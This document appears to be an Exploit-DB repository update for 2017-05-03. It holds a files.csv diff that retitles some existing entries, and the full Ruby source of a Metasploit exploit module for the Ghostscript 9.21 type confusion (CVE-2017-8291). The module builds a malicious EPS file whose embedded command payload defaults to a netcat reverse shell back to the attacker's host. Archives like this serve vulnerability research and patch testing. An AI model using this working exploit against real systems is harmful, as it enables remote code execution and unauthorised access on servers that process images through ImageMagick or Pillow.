DB: 2017-05-03

1 new exploits

MySQL <= 5.6.35 / <= 5.7.17 - Integer Overflow
MySQL < 5.6.35 / < 5.7.17 - Integer Overflow

Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)

Tuleap Project Wiki 8.3 <= 9.6.99.86 - Command Injection
Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection

files.csv

@@ -5481,7 +5481,7 @@ id,file,description,date,author,platform,type,port
 41941,platforms/windows/dos/41941.html,"Microsoft Internet Explorer 11.576.14393.0 - 'CStyleSheetArray::BuildListOfMatchedRules' Memory Corruption",2017-04-27,"Google Security Research",windows,dos,0
 41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0
 41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0
-41954,platforms/multiple/dos/41954.py,"MySQL <= 5.6.35 / <= 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0
+41954,platforms/multiple/dos/41954.py,"MySQL < 5.6.35 / < 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8966,6 +8966,7 @@ id,file,description,date,author,platform,type,port
 41933,platforms/windows/local/41933.txt,"Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation",2017-04-25,"Google Security Research",windows,local,0
 41951,platforms/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Privilege Escalation",2017-05-01,"Han Sahin",osx,local,0
 41952,platforms/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation",2017-05-01,"Han Sahin",macos,local,0
+41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -37803,4 +37804,4 @@ id,file,description,date,author,platform,type,port
 41947,platforms/multiple/webapps/41947.txt,"Emby MediaServer 3.2.5 - Password Reset",2017-04-30,LiquidWorm,multiple,webapps,0
 41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0
 41950,platforms/linux/webapps/41950.py,"Alerton Webtalk 2.5 / 3.3 - Multiple Vulnerabilities",2017-05-01,"David Tomaschik",linux,webapps,0
-41953,platforms/php/webapps/41953.txt,"Tuleap Project Wiki 8.3 <= 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps,0
+41953,platforms/php/webapps/41953.txt,"Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps,0

platforms/linux/local/41955.rb

@@ -0,0 +1,75 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Ghostscript Type Confusion Arbitrary Command Execution',
+      'Description'     => %q{
+        This module exploits a type confusion vulnerability in Ghostscript that can
+        be exploited to obtain arbitrary command execution. This vulnerability affects
+        Ghostscript version 9.21 and earlier and can be exploited through libraries
+        such as ImageMagick and Pillow.
+      },
+      'Author'          => [
+        'Atlassian Security Team', # Vulnerability discovery
+        'hdm'                      # Metasploit module
+      ],
+      'References'      => [
+        %w{CVE 2017-8291},
+        %w{URL https://bugs.ghostscript.com/show_bug.cgi?id=697808},
+        %w{URL http://seclists.org/oss-sec/2017/q2/148},
+        %w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=04b37bbce174eed24edec7ad5b920eb93db4d47d},
+        %w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4f83478c88c2e05d6e8d79ca4557eb039354d2f3}
+      ],
+      'DisclosureDate'  => 'Apr 27 2017',
+      'License'         => MSF_LICENSE,
+      'Platform'        => 'unix',
+      'Arch'            => ARCH_CMD,
+      'Privileged'      => false,
+      'Payload'         => {
+        'BadChars'      => "\x22\x27\x5c)(", # ", ', \, (, and )
+        'Compat'        => {
+          'PayloadType' => 'cmd cmd_bash',
+          'RequiredCmd' => 'generic netcat bash-tcp'
+        }
+      },
+      'Targets'         => [
+        ['EPS file',  template: 'msf.eps']
+      ],
+      'DefaultTarget'   => 0,
+      'DefaultOptions'  => {
+        'PAYLOAD'               => 'cmd/unix/reverse_netcat',
+        'LHOST'                 => Rex::Socket.source_address,
+        'DisablePayloadHandler' => false,
+        'WfsDelay'              => 9001
+      }
+    ))
+
+    register_options([
+      OptString.new('FILENAME', [true, 'Output file', 'msf.eps'])
+    ])
+  end
+
+  # Example usage from the bug tracker:
+  # $ gs -q -dNOPAUSE -dSAFER -sDEVICE=ppmraw -sOutputFile=/dev/null -f exploit2.eps
+
+  def exploit
+    file_create(template.sub('echo vulnerable > /dev/tty', payload.encoded))
+  end
+
+  def template
+    ::File.read(File.join(
+      Msf::Config.data_directory, 'exploits', 'CVE-2017-8291',
+      target[:template]
+    ))
+  end
+
+end